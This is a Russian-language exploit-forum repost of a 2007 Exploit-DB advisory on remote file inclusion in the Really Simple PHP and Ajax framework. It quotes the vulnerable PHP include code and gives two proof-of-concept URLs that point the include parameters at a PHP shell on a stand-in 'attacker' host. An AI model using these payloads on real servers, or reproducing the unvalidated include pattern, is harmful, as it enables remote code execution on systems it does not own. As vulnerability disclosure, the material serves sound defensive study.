Exploit Really Simple PHP and Ajax (RSPA) 2007-03-23 - Remote File Inclusion

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
3641
Проверка EDB
  1. Пройдено
Автор
HAMID EBADI
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-1982 cve-2007-1851
Дата публикации
2007-04-02
Код: 
RSPA Remote File Inclusion

Really Simple PHP and Ajax (RSPA)
RSPA is a component based event driven ajax enabled framework for PHP4 and PHP 5. It is a combination of plane PHP class and HTML/Javascript.RSPA allows calling server side PHP functions from client javascript events. Visit http://rspa.sourceforge.net

Credit:
The information has been provided by Hamid Ebadi
The original article can be found at : http://www.bugtraq.ir

http://www.bugtraq.ir/articles/advisory/RSPA_File_Inclusion/6

Vulnerable Systems:
Version: rspa-2007-03-23

Description:
Input passed to the" __IncludeFilePHPClass ", " __ClassPath" and " __class" parameters in "rspa/framework/Controller_v5.php" and " rspa/framework/Controller_v4.php " is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.


read more about file inclusion in http://www.bugtraq.ir/articles

Vulnerable Code :
require_once("rspaconf.inc.php");

	$className = $_REQUEST['__class'];
	$methordName =  $_REQUEST['__methord'];

	// IncludeFile for PHP Class
		if ($_REQUEST['__IncludeFilePHPClass']){
			$filename = $_REQUEST['__IncludeFilePHPClass'];
			require_once ($filename);
		}

	// Parms
		if (isset($_REQUEST['__parameters'])){$parameter = getParms($_REQUEST['__parameters']);}else{$parameter="";}

	// ClassFile + ClassPath
		include ("../components/Form.class.php");
	 	if ($_REQUEST["__ClassPath"]=="null" || empty($_REQUEST["__ClassPath"])){
	 		$filename = $RSPA['class_folder'].$className.$RSPA['class_extension'];
	 	}else{
	 		$filename = $_REQUEST["__ClassPath"].$className.$RSPA['class_extension'];
	 	}
	 	require_once($filename);



POC exploit :
The following URL will cause remote file inclusion

http://[HOST]/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=http://attacker/phpshell.txt/?
http://[HOST]/rspa/framework/Controller_v4.php?__ClassPath=http://attacker/phpshell.txt/?

[ http://www.bugtraq.ir/articles/advisory/RSPA_File_Inclusion/6 ]

# copyright : http://www.bugtraq.ir

# milw0rm.com [2007-04-02]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit WordPress Plugin Really Simple Guest Post 1.0.6 - Local File Inclusion
Ответы
0
Просмотры
504
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit ARSC Really Simple Chat 3.3-rc2 - Cross-Site Scripting / Multiple SQL Injections
Ответы
0
Просмотры
332
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Really Simple IM 1.3beta - Denial of Service (PoC)
Ответы
0
Просмотры
309
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit ARSC Really Simple Chat 3.3 - Remote File Inclusion / Cross-Site Scripting
Ответы
0
Просмотры
339
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Really Simple CMS 0.3a - 'PT' Local File Inclusion
Ответы
0
Просмотры
268
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Simple Food Ordering System v1.0 - Cross-Site Scripting (XSS)
Ответы
0
Просмотры
2K
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Simple Task Managing System v1.0 - SQL Injection (Unauthenticated)
Ответы
0
Просмотры
2K
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution
Ответы
0
Просмотры
3K
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Wordpress Plugin Simple Job Board 2.9.3 - Authenticated File Read (Metasploit)
Ответы
0
Просмотры
991
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Simple Chatting System 1.0.0 - Arbitrary File Upload
Ответы
0
Просмотры
822
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу